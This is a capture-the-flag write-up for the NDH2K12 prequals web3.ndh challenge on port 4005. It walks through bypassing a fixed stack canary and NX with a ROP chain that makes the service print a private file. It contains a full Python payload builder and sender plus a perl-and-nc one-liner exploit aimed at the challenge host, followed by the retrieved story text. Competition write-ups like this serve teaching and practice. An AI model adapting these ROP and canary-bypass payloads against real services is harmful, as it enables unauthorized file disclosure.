NDH2K12 Prequals: web3.ndh writeup (port 4005)
From: Piotr <piotr@megacortek.com>
To: LSE <lse@megacortek.com>
Subject: Another weird link
Attachments: web3.ndh
Thank you again for this information! We have just credited your account
with $1700. Our spy thinks that Sciteek staff is aware of the mole
inside their building. He is trying to read a private file named
"sciteek-private.txt" located at sciteek.nuitduhack.com:4005. Please find
the .ndh attached; if you are successful, reply with a message entitled
"complex remote service".
Of course, your efforts will be rewarded with $2500. Maybe you will find
pieces of information about the mole.
Piotr
As before, we can easily run this .ndh file in the VM we were given to understand the behavior of the program, but this time we also had an IDA plugin to help us.
The program reserves 0x200 bytes for the received buffer and sets up a canary on the stack at offset 0x200 to prevent a stack-based buffer overflow. But the canary is always the same value, 0xbeef, so this protection will be easy to bypass: we simply write 0xbeef back at offset 0x200 before overwriting the return address.
Another protection has been set up on this challenge: the NX bit. Unlike service 4004, we won't be able to execute code from our buffer, so we will use ROP techniques to bypass it.
We found an excellent helper function (like in service 4000), "disp_file_content", which opens the file whose name is pointed to by R0, reads it onto the stack and sends its content back over the socket:
ROM:8201 disp_file_content:
ROM:8201 PUSH R1
ROM:8204 PUSH R2
ROM:8207 PUSH R3
ROM:820A PUSH R4
ROM:820D PUSH R5
ROM:8210 MOVL R1, 0
ROM:8215 CALL SYSCALL_OPEN
ROM:8219 CMPL R0, $FFFF
ROM:821E JNZ file_valid
ROM:8221 XOR R0, R0
ROM:8225 POP R5
ROM:8227 POP R4
ROM:8229 POP R3
ROM:822B POP R2
ROM:822D POP R1
ROM:822F RET
ROM:8230 ; ---------------------------------------------------------------------------
ROM:8230
ROM:8230 file_valid: ; CODE XREF: disp_file_content+1D
ROM:8230 MOV R3, R0
ROM:8234 MOVL R1, 0
ROM:8239 MOVL R2, $2
ROM:823E CALL SYSCALL_FSEEK
ROM:8242 MOV R4, R0
ROM:8246 INC R4
ROM:8248 MOV R0, R3
ROM:824C MOVL R1, 0
ROM:8251 MOVL R2, 0
ROM:8256 CALL SYSCALL_FSEEK
ROM:825A SUB SP, R4
ROM:825E MOV R5, SP
ROM:8262 MOV R0, R3
ROM:8266 MOV R1, SP
ROM:826A MOV R2, R4
ROM:826E CALL SYSCALL_READ
ROM:8272 ADD R4, R5
ROM:8276 DEC R4
ROM:8278 MOVBT R4, 0
ROM:827C MOV R0, R5
ROM:8280 CALL write_socket
ROM:8284 MOVB R0, 1
ROM:8288 INC R4
ROM:828A SUB R4, R5
ROM:828E ADD SP, R4
ROM:8292 POP R5
ROM:8294 POP R4
ROM:8296 POP R3
ROM:8298 POP R2
ROM:829A POP R1
ROM:829C RET
ROM:829C ; End of function disp_file_content
Before calling this function we have to set R0 to the address of the required file name ("sciteek-private.txt"), which we place at the start of our buffer.
We will use these simple gadgets to change the value of R0 and quit the program correctly:
ROM:80BD POP R0
ROM:80BF RET
[...]
ROM:838C END
The exploitation scheme looks like this (the canary word 0xbeef must sit right after the 0x200-byte buffer, followed by the return address, which we point at our first gadget):
[file_name] [NULL_PADDING] [CANARY] [POP_R0;RET] [ADDR_BUFF] [disp_file_content] [END]
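To make the layout explicit, here is a small payload builder written for this writeup (it is not part of the original exploit or of the challenge). It takes the constants from the disassembly above and from the final exploit (buffer size 0x200, canary 0xbeef, POP R0;RET at 0x80bd, disp_file_content at 0x8201, END at 0x838c, and the buffer address 0x7bf4 that the exploit uses), packs every word little-endian as the 16-bit VM expects, and pads the file name with NUL bytes so the canary lands exactly at offset 0x200. The `describe_payload` helper and `send_payload` function are my own additions for inspecting and delivering the chain; the host and port are the ones given in the e-mail.

```python
import socket
import struct

# Values taken from the writeup's disassembly and final exploit.
BUF_SIZE = 0x200            # receive buffer: filename + NUL padding must fill it
CANARY = 0xBEEF             # static canary stored right after the buffer
POP_R0_RET = 0x80BD         # gadget: POP R0 ; RET
DISP_FILE_CONTENT = 0x8201  # opens the file named at R0 and writes it to the socket
END_GADGET = 0x838C         # END instruction: terminates the program cleanly
BUF_ADDR = 0x7BF4           # stack address of the receive buffer (from the exploit)


def u16(value):
    """Pack a 16-bit word little-endian, as the VM stores it on the stack."""
    return struct.pack("<H", value)


def build_payload(filename, buf_addr=BUF_ADDR):
    """Return the ROP payload that makes the service print `filename`.

    Layout: [name\\0][NUL padding to 0x200][canary][POP R0;RET][buf_addr]
            [disp_file_content][END]
    """
    name = filename.encode() + b"\x00"      # SYSCALL_OPEN needs a NUL-terminated name
    if len(name) > BUF_SIZE:
        raise ValueError("filename does not fit in the 0x200-byte buffer")
    padding = b"\x00" * (BUF_SIZE - len(name))
    chain = (
        u16(CANARY)             # keep the canary check happy
        + u16(POP_R0_RET)       # saved return address -> first gadget
        + u16(buf_addr)         # popped into R0: pointer to our filename
        + u16(DISP_FILE_CONTENT)  # RET lands here with R0 set
        + u16(END_GADGET)       # disp_file_content's RET lands on END
    )
    return name + padding + chain


def describe_payload(payload):
    """Decode the words that follow the buffer, for sanity checking offsets."""
    words = struct.unpack_from("<5H", payload, BUF_SIZE)
    return {
        "filename": payload.split(b"\x00", 1)[0].decode(),
        "canary": words[0],
        "ret": words[1],
        "r0": words[2],
        "gadget2": words[3],
        "gadget3": words[4],
    }


def send_payload(payload, host="sciteek.nuitduhack.com", port=4005, timeout=10):
    """Deliver the payload and return whatever the service writes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    p = build_payload("sciteek-private.txt")
    print(describe_payload(p))
    print(send_payload(p).decode(errors="replace"))
```

`describe_payload` is there to catch the classic off-by-one: if the canary word does not decode as 0xbeef at offset 0x200, the padding length is wrong and the service will abort before reaching our gadgets.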
Here is the final exploit (19 bytes of file name + 493 NUL bytes = 0x200, then the canary and the chain, all little-endian):
perl -e 'print "sciteek-private.txt" . "\x00"x493 . "\xef\xbe" . "\xbd\x80" . "\xf4\x7b" . "\x01\x82" . "\x8c\x83"' | nc sciteek.nuitduhack.com 4005
Dear Patrick,
We found much evidence proving there is a mole inside our company who is selling confidential materials to our main competitor, Megacortek. We have very good reasons to believe that Walter Smith has sent some emails to a contact at Megacortek, containing confidential information.
However, these emails seem to have been encrypted and sometimes contain images or audio files which are apparently not related to our company or our business, but one of them contains an archive with an explicit name.
We cannot stand this situation anymore, and we should take actions to make Mr Smith leave the company: we can fire this guy or why not call the FBI to handle this case as it should be.
Sincerely,
David Markham.